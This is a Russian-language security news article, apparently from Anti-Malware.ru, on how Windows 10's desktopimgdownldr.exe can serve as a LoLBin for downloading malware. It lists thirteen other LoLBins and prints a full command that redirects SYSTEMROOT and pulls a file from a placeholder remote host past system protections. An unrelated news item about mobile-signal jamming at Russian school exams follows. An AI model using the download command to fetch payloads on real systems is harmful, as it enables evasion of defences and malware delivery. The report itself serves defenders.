Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Исполняемые системные файлы Windows 10, отвечающие за установку фона рабочего стола и экрана блокировки, могут посодействовать злоумышленникам — с их помощью атакующий может загрузить на компьютер вредоносную программу в обход средств защиты.

Эти файлы известны под именем LoLBins (living-of-the-land binaries), они идут в комплекте с каждой версией ОС и служат вполне определённым безобидным целям. Однако киберпреступники могут использовать LoLBins на заключительном этапе своей атаки, чтобы скрыть вредоносную активность в системе.

Например, условный атакующий может задействовать LoLBins для загрузки и установки вредоносной программы, которая успешно обойдёт защитные механизмы Windows — контроль учётных записей пользователей (UAC) и политики WDAC.

В прошлом году эксперты Cisco Talos опубликовали список из 13 системных исполняемых файлов Windows, которые могут в теории загрузить и выполнить вредоносный код:

  • powershell.exe
  • bitsadmin.exe
  • certutil.exe
  • psexec.exe
  • wmic.exe
  • mshta.exe
  • mofcomp.exe
  • cmstp.exe
  • windbg.exe
  • cdb.exe
  • msbuild.exe
  • csc.exe
  • regsvr32.exe

Теперь к изучению проблемы подключились исследователи из SentinelOne. Они обнаружили, что desktopimgdownldr.exe (располагается в системной директории system32) также может послужить в качестве LoLBin.

Задача файла desktopimgdownldr.exe в Windows проста — устанавливать фон рабочего стола или экрана блокировки. По сути, это компонент всего механизма, отвечающего за персонализацию ОС.

Настройки функции установки фона рабочего стола допускают файлы в форматах JPG, JPEG, PNG. Как правило, файл desktopimgdownldr.exe работает с привилегиями администратора, однако команда SentinelOne выяснила, что этот компонент можно запустить с правами обычного пользователя для загрузки файлов из внешнего источника.

Если злоумышленник поменяет переменную среды %systemroot%, он сможет изменить директорию для загрузки произвольного файла и обойти средства защиты операционной системы:

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

На ЕГЭ начнут массово глушить мобильную связь из-за микронаушников

Системы подавления сигнала мобильной связи планируют развернуть в большинстве пунктов проведения Единого государственного экзамена (ЕГЭ). Как ожидается, это поможет бороться с массовым использованием микронаушников, которые не обнаруживаются металлодетекторами.

О расширении применения таких средств сообщил глава Рособрнадзора Анзор Музаев в комментарии ТАСС. По его словам, со временем подобное оборудование появится во всех пунктах проведения ЕГЭ.

«Злоумышленники перестроились и начали выпускать очень маленькие мобильные устройства, связанные с наушниками, в которых практически нет металла. Рамка никак не повлияет на это. Против этого существует один способ — средства подавления связи. Здесь есть решения как у субъектов Российской Федерации, так и с нашей стороны; отечественные технологические компании тоже предлагают такие решения. Субъекты активно внедряют средства подавления связи. Это, наверное, самое эффективное средство, чтобы в первую очередь не отвлекать ребят, которые честно сдают экзамен», — рассказал глава Рособрнадзора.

Согласно данным «Ростелекома», только интеллектуальная сеть видеонаблюдения во время экзаменационной кампании 2025 года выявила около 800 случаев списывания различными способами. Речь идёт как об использовании традиционных шпаргалок, так и о применении различных технологических средств. Кроме того, ранее была пресечена попытка использовать умные очки для съёмки заданий и передачи их за пределы аудитории.

RSS: Новости на портале Anti-Malware.ru